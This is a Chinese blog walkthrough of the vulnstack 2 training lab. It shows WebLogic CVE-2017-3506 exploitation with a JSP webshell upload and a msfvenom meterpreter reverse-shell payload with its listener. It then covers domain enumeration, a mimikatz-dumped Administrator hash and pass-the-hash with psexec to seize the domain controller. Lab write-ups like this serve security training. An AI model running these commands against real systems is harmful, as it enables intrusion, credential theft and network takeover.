红日(vulnstack)2 内网渗透ATT&CK实战

最新推荐文章于 2024-07-23 17:45:23 发布
最新推荐文章于 2024-07-23 17:45:23 发布
阅读量1.3k 收藏
点赞数 1
分类专栏: 内网渗透系列 文章标签: 开发语言 linux 服务器 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66299232/article/details/129337389
版权

环境配置

链接:百度网盘 请输入提取码

提取码:wmsi

攻击机:kali2022.03

web 192.168.111.80 10.10.10.80 自定义网卡8,自定义网卡18

PC 192.168.111.201 10.10.10.201 自定义网卡8,自定义网卡18

DC 192.168.52.141 自定义网卡18

所有靶机密码为:1qaz@WSX

登录web de1ay 修改密码为Admin@123,

再切换用户mssql登录进行后,手动开启weblogic服务

C:\Oracle\Middleware\user_projects\domains\base_domain\bin

web渗透

1.扫描靶机开放端口和相应服务情况

nmap -p- -A -sV 192.168.111.80

2.进行下载weblogicscan配置requests时报的错

3.进行扫描成功探测到CVE-2017-3506

4.下载利用工具

git clone GitHub - ianxtianxt/CVE-2017-3506: CVE-2017-3506

5.java -jar WebLogic-XMLDecoder.jar //查看利用方法

java -jar WebLogic-XMLDecoder.jar -u http://192.168.111.80:7001/ //探测是否存在漏洞

java -jar WebLogic-XMLDecoder.jar -s http://192.168.111.80:7001/ /wls-wsat/CoordinatorPortType11 shell.jsp //上传木马

6.访问网址成功命令执行

http://192.168.111.80:7001//wls-wsat/shell.jsp?password=secfree&command=whoami

7.本地配置http代理,进行抓包

8.执行命令,成功抓到。

proxychains java -jar WebLogic-XMLDecoder.jar -s http://192.168.111.80:7001/ /wls-wsat/CoordinatorPortType11 shell.jsp

9.生成哥斯拉木马

10.查看木马,并复制去替换他命令执行的代码

11.成功替换

12.成功上线哥斯拉

13.msfvenom生成payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=5555 -f exe -o shell.exe

14.上传文件到哥斯拉

15.msf开启监听

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.111.129

set LPORT 5555

run

内网渗透

1.getsystem提权到管理员权限

2.ipconfig /all查看本机ip,所在域

3.信息收集

net user /domain //查看域用户

net group "domain admins" /domain //查看域管理员

net group "domain controllers" /domain //查看域控制器

net group "domain computers" /domain //查看域中的其他主机名

4.ping DC 拿到其ip地址

run autoroute -s 10.10.10.0/24 //添加路由

5.加载猕猴桃,拿到administrator的hash

Administrator

161cff084477fe596a5db81874498a24

6.配置代理

use auxiliary/server/socks_proxy

set srvhost 127.0.0.1

set srvport 8989

run

7.直接用impacket包里的psexec.py进行攻击,成功拿下域控

proxychains psexec.py -hashes :161cff084477fe596a5db81874498a24 ./administrator@10.10.10.10

魏钦6666
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
(14条消息) 红日安全vulnstack-ATT&CK实战系列 红队实战(一)_Ys3ter的博客-CSDN博客.html
05-27
(14条消息) 红日安全vulnstack-ATT&CK实战系列 红队实战(一)_Ys3ter的博客-CSDN博客.html
ATT&CK框架介绍及战技术对照表
05-18
**ATT&CK框架详解** ATT&CK(Adversarial Tactics, Techniques & Common Knowledge)是由MITRE公司开发的一个公开的知识库,旨在提供一个统一的视角来理解和防御网络攻击。该框架详细描述了攻击者在不同阶段可能...
红日vulnstack)3 内网渗透ATT&CK实战
m0_66299232的博客
03-11 1690
蚁剑成功连接后无法执行命令,disable_functions插件,权限提升-脏牛漏洞,用msfvenom生成木马文件,msf开启监听,执行木马文件,成功反弹shell到msf上 use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp set LHOST 192.168.1.106 set LPORT 1106 run 使用use auxiliary/scanner/smb/smb_login模块,进行smb爆破
红日vulnstack)4 内网渗透ATT&CK实战
m0_66299232的博客
03-21 664
MS14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器地址 -p 域成员密码。1.SHELL=bash script -q /dev/null //反弹交互式shell。mount /dev/sda1 hak //将宿主机/dev/sda1 目录挂载至容器内。3.因为靶机作者已经把利用工具已放到了桌面,切换到桌面目录,可以直接利用。./fscan -h 192.168.54.0/24 //开始扫描。8.把本地生成的木马,上传到win7的c盘,然后复制到域控的c盘。
红日安全vulnstack-ATT&CK实战系列 红队实战(四)
遇事不决冲冲冲
03-29 8402
一.介绍 下载地址http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ st漏洞利用phpmyadmin getshell、tomcat 漏洞利用、docker逃逸、ms14-068、ssh密钥利用、流量转发、历史命令信息泄露、 域渗透 机器密码 web: ubuntu:ubuntu win7: douser:Dotest123 DC: administrator:Test2008 .环境搭建 下载完成后为三个压缩包,解压后如图 在每个文件夹中创建
红日-VulnStack靶场-ATT&CK(一)横向渗透两种方法
braty_的博客
09-26 798
红日-VulnStack靶场-ATT&CK(一),分享两种内网横向渗透的方法。
红日安全vulnstack-ATT&CK实战系列 红队实战(一)
热门推荐
遇事不决冲冲冲
12-25 1万+
一.介绍 vulnstack官网下载地址,也是拿百度网盘下载的,这里也放一个链接提取码: i7xv 官方靶机说明: 红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟 ATT&CK攻击链路进行搭建,开成完整闭环。后续也会搭建真实 APT 实战环境,从实战中成长。虚拟机所有统一密码:hongrisec@2019 整体思路 信息收集发现yxcms框架的网页,通过漏洞利用get到shell,拿cs控制后进行内网信息收集以及横向移动,最终用窃
ATT&CK 实战 - 红日安全 vulnstack (一)
洛柒尘的博客
08-20 4558
前言 1 | 环境搭建 | 1.0 | 靶场介绍 | ATT&CK实战系列—红队实战(一)是红日安全团队出品的一个实战环境,该靶场模拟真实环境。 1.0.0 | 靶场信息 | 靶场名: vulnstack 1 下载链接: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 靶机数量: 3 1.0.1 | 虚拟机配置 | 所有主机密码为:hongrisec@2019 密码同一修改为:hongrisec@2021 攻击机 名称
红日安全vulnstack-ATT&CK实战系列 红队实战()
遇事不决冲冲冲
02-05 6447
红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。关于靶场统一登录密码:1qaz@WSX
ATT&CK 实战 - 红日安全 vulnstack(一)渗透记录
daxi0ng的博客
11-26 2388
1、下载好镜像文件。 2、直接vmware启动即可。 这里我用自己的win10虚拟机作为攻击机,设置为双网卡NAT,vm2(192.168.234.131) 设置win7为双网卡,vm1(192.168.52.143),vm2(192.168.234.130) 设置win08单网卡vm1(192.168.52.138),win2k3为单网卡vm1(192.168.52.141) 这样win10就可以访问win7,但不能直接访问win08和win2k3。 三台靶机的初始密码都是ho
红日安全ATTCK靶机实战系列之vulnstack4
黑白的博客
04-25 8118
声明 好好学习,天天向上 环境配置 下载地址,直接进去用百度云,没有会员也下的非常快 http://vulnstack.qiyuanxuetang.net/vuln/detail/6/ 边下载着,可以开始vmware的网络配置 有两个网段,外网网段是我自己设置的桥接模式192.168.31.1/24,内网网段,vmware加一个网卡VMnet3,192.168.183.1/24 和前面的大同小异,我这里就不细说了看过系列文章的应该都已经很清楚这种网络结构了,我直接贴图吧 桥接的就是攻击机与边界服务器的网卡
ATT&CK手册(修改版)
09-16
**ATT&CK手册(修改版)** ATT&CK(Adversarial Tactics, Techniques & Common Knowledge)是由美国非营利组织MITRE Corporation开发的一种框架,用于描述和分类网络攻击者的行为战术、技术和过程(TTPs)。这个框架...
ATT&CK中文手册.zip
11-24
一、Initial Access(入口点) 、Execution(命令执行) 三、Persistence(持久化) 四、Privilege Escalation(权限提升) 五、Defense Evasion(绕过防御...movement(横向渗透) 九、C&C(命令控制) 十、Exfiltration(信息窃取
主流开发语言开发环境介绍
weixin_44215445的博客
07-23 1182
主流开发语言开发环境介绍
Linux:基础命令学习
qq_55038440的博客
07-20 1358
实例:-F根据文件类型在列出的文件名称后加一符号。实例: -R 递归显示目录中的所有文件和子目录。. 开头的隐藏文件也会列出。可执行文件则加 "*",用于显示目录文件信息。
LINUX之MMC子系统分析
gy794627991的博客
07-23 1044
MMC子系统从协议到源码分析
Linux】条件变量及生产者消费者模型
最新发布
2301_78636079的博客
07-23 1043
条件变量与生产消费者模型
构建与运营企业内部ATT&CK框架
"本文档主要讨论了如何在企业内部建立和运营ATT&CK框架,以及其更新和路线图。ATT&CK是由MITRE创建的一种基于已知攻击技术的知识库,旨在帮助组织理解和防御高级持续性威胁(APT)的攻击手法。文档提到了ATT&CK的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值